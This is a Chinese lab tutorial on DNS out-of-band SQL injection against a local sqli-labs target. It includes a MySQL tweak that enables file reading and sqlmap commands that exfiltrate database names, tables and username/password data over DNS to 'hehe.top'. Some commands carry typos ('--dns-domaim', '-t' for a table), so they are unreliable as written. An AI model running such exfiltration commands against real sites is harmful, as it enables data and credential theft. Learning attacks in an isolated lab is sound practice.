目录
1.win11中下载小皮搭建sqli-labs靶场并查看win11数据库中的文件读取配置
2.2.2在win11靶机ping一下server2008中创建的域名并打开kali查看
2.2.4测试转发器的域名是否可以ping通并查看kali中接收情况
📓前言
- 在最近学习了sql注入的时间盲注后,感觉使用它效率还是不够快,我们这时就可以使用外带注入了,大致就是自己搭建一个dnslog平台,或者使用一个现成的在线平台,比如ceye,然后sqlmap执行的时候加上--dns-domain=xxxx.com 参数就可以,但是使用平台时你可以通过手工注入后在平台看到回显,下面将演示通过一台Windows server 2008(i192.168.78.169)和kali(192.168.78.156)还有一台win11(192.168.78.175),来实现sqlmap的dns外带注入
📓操作步骤
1.win11中下载小皮搭建sqli-labs靶场并查看win11数据库中的文件读取配置
show variables like '%secure%';
#当secure_file_priv为空,就可以读取磁盘的目录。
#当secure_file_priv为G:\,就可以读取G盘的文件。
#当secure_file_priv为null,load_file就不能加载文件。
phpstudy中在D:\phpstudy_pro\Extensions\MySQL5.7.26下找到my.ini打开添加一条secure_file_priv=""
2.环境准备
2.1Windows server2008
2.1.1搭建dns服务器
2.2测试
2.2.1设置靶机的网络的dns为server2008
2.2.2在win11靶机ping一下server2008中创建的域名并打开kali查看
2.2.3server2008中创建转发器
2.2.4测试转发器的域名是否可以ping通并查看kali中接收情况
2.3开始sqlmap使用dnslog外带注入
2.3.1取库
#注入查库
sqlmap -u "http://192.168.78.175/sqli-labs-master/Less-8?id=1" --technique=T --dns-domaim "hehe.top" --dbs
2.3.2取表
#获取表
sqlmap -u "http://192.168.78.175/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "hehe.top" -D "security" --tables
2.3.3取users表的列
#查列
sqlmap -u "http://192.168.78.175/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "hehe.top" -D "security" -t "users" --columns
2.3.4取表users数据
#取列值
sqlmap -u "http://192.168.78.175/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "hehe.top" -D "security" -t "users" -C "username,password" --dump